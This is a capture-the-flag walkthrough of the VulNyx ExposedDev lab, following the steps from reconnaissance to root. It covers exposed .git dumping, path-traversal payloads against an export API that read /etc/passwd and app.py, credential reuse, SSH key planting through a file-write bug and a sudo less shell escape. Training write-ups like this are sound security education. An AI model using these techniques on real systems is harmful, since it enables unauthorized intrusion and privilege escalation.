
VulNyx ExposedDev — Write-up

Abdulhamid



https://vulnyx.com/file/ExposedDev.php

1. Recon

Nmap showed 2 open ports:

nmap 192.168.100.43 -p-                
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http


The HTTP service gave some hints: the user might be piersi, and the CTF is related to PHP.

2. VHost Discovery

I could not find anything useful except a /login page, and I could not guess the credentials. I then tried vhost fuzzing and found development:

ffuf -u http://192.168.100.43/ -H "Host: FUZZ.exposeddev.nyx" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fs 178


v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://192.168.100.43/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
:: Header : Host: FUZZ.exposeddev.nyx
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 178
________________________________________________

development [Status: 200, Size: 417, Words: 65, Lines: 15, Duration: 1ms]

3. .git Jackpot

There was nothing on the page. I tried many things, and when I checked whether .git existed, I found it:

ffuf -u http://development.exposeddev.nyx/.git/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200


v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://development.exposeddev.nyx/.git/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
________________________________________________

config [Status: 200, Size: 145, Words: 13, Lines: 9, Duration: 1ms]
index [Status: 200, Size: 886, Words: 3, Lines: 21, Duration: 3ms]
:: Progress: [4746/4746] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::Then downloaded git dumper from github and run:

Then I downloaded git-dumper from GitHub and ran it:

git clone https://github.com/arthaud/git-dumper.git
cd git-dumper
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python3 git_dumper.py http://development.exposeddev.nyx/.git ./dev-repo

4. First Creds — And a Little API Abuse

After investigating the dumped repository, I found the credentials admin:dIevInSiOlan:


I used these to log in at exposeddev.nyx/login and, after some tweaking, found that I could download /etc/passwd by changing the export link

from http://exposeddev.nyx/api/export_chat?chat_name=Developing_Chat/chat_log.txt

to http://exposeddev.nyx/api/export_chat?chat_name=/etc/passwd


5. Local File Read → Source Code Loot

From /etc/passwd I learned that there are piersi and debi users on the system. After some trial and error I found http://exposeddev.nyx/api/export_chat?chat_name=Developing_Chat/../../app.py, since piersi had written in the chat log that he is learning Flask. That gave me the database password:
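The export_chat bug in sections 4 and 5 is a classic path traversal: the chat_name parameter is joined onto a directory without any containment check. The following is an added example (not the author's code and not the real app.py, which the write-up never shows) that models the vulnerable handler next to a hardened one; the directory layout and file contents are constructed for the demonstration.

```python
import os
import tempfile
from pathlib import Path

# Constructed sample layout standing in for the app's chat directory. The page never
# shows app.py, so the handler shape below is an assumption, not the real code.
BASE = Path(tempfile.mkdtemp(prefix="chats_"))
(BASE / "Developing_Chat").mkdir()
(BASE / "Developing_Chat" / "chat_log.txt").write_text("piersi: learning flask\n")
# A file outside the chat directory that an export must never be able to reach.
OUTSIDE = BASE.parent / (BASE.name + "_secret.txt")
OUTSIDE.write_text("DB_PASSWORD=placeholder\n")


def export_chat_vulnerable(chat_name: str) -> str:
    """Mirrors the flaw in the write-up: the parameter is joined onto the base with
    no check. os.path.join discards BASE when chat_name is absolute, and ../ walks
    out of it, which is exactly how /etc/passwd and app.py were read."""
    return Path(os.path.join(BASE, chat_name)).read_text()


def safe_resolve(base: Path, requested: str) -> Path:
    """Resolve `requested` under `base` and refuse anything outside it.
    Absolute paths are rejected up front; ../ and symlinks are caught by
    resolving both sides and checking containment afterwards."""
    if os.path.isabs(requested) or "\x00" in requested:
        raise ValueError("absolute paths are not allowed")
    base_real = base.resolve()
    target = (base_real / requested).resolve()
    if base_real not in target.parents:
        raise ValueError(f"path escapes export directory: {requested!r}")
    if not target.is_file():
        raise FileNotFoundError(requested)
    return target


def export_chat_hardened(chat_name: str) -> str:
    """Same feature as above, but every name passes the containment check."""
    return safe_resolve(BASE, chat_name).read_text()


def hardened_rejects(chat_name: str) -> bool:
    """True when the hardened export refuses the name (used for the checks below)."""
    try:
        export_chat_hardened(chat_name)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(export_chat_hardened("Developing_Chat/chat_log.txt"), end="")
    for bad in ("/etc/passwd", "Developing_Chat/../../" + OUTSIDE.name):
        print(bad, "->", "rejected" if hardened_rejects(bad) else "ALLOWED")
```

The same containment check belongs on the note-writing feature from section 7: a write that can land outside the app's own directory is how a file ends up in a home directory it should never touch.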


I logged in over SSH with these credentials: piersi:MabEwReOmcpG!123

6. Chasing debi – Port Forwarding Fun


I logged in over SSH as piersi with that password, but there was no user flag. It was clear that debi had it, so I uploaded linpeas and tried pkexec, which did not work. Then, before giving up, I found that port 3000 was being served by user debi:

ps aux | grep debi
debi 734 0.0 0.9 27392 19748 ? Ss 18:25 0:00 /usr/bin/python3 /usr/local/bin/gunicorn -w 4 -b 127.0.0.1:3000 app:app
debi 906 0.0 2.3 58468 48016 ? S 18:25 0:01 /usr/bin/python3 /usr/local/bin/gunicorn -w 4 -b 127.0.0.1:3000 app:app
debi 909 0.0 2.3 58468 48012 ? S 18:25 0:01 /usr/bin/python3 /usr/local/bin/gunicorn -w 4 -b 127.0.0.1:3000 app:app
debi 912 0.0 2.3 58468 48040 ? S 18:25 0:01 /usr/bin/python3 /usr/local/bin/gunicorn -w 4 -b 127.0.0.1:3000 app:app
debi 915 0.0 2.3 58468 48020 ? S 18:25 0:01 /usr/bin/python3 /usr/local/bin/gunicorn -w 4 -b 127.0.0.1:3000 app:app
piersi 42777 0.0 0.0 6300 720 pts/0 S+ 18:43 0:00 grep debi

Then I forwarded it:

ssh -L 9999:127.0.0.1:3000 piersi@192.168.100.43

The forwarded web app was nothing but a login page; I reused the credentials, and this worked: debi:MabEwReOmcpG!123

7. No SSTI, But Arbitrary File Write


I tried SSTI, because the chat with piersi mentioned that debi is struggling to understand how Jinja works. That did not succeed. Then I tried to write a file in /tmp, and it worked!


I couldn’t read it, because it was created by debi:


As you guessed, I wrote my public SSH key to debi’s authorized_keys:


ssh -i ~/.ssh/id_rsa debi@192.168.100.43

— got user flag!

8. Privilege Escalation — “less” is More

I checked the sudo permissions:

User debi may run the following commands on exposeddev:
(ALL) NOPASSWD: /usr/local/bin/status_notevault.sh

Contents of the script:

#!/bin/bash
/usr/bin/systemctl status NoteVault.service | /usr/bin/less

Here’s the deal:

  • Script runs less as root (because it’s run via sudo).
  • less lets you drop into a shell with !.
  • That shell inherits root privileges.

9. Root Time

sudo /usr/local/bin/status_notevault.sh

Inside less, I typed:

!/bin/bash

And just like that:

whoami
root


10. Lessons Learned

  • .git in production is basically a piñata for hackers.
  • If you expose file export features, people will try ../../../../etc/passwd.
  • Never underestimate the power of less. Sometimes less really is more.

#cybersecurity #vulnyx #less #git_dumper #ctf #writeup #walkthrough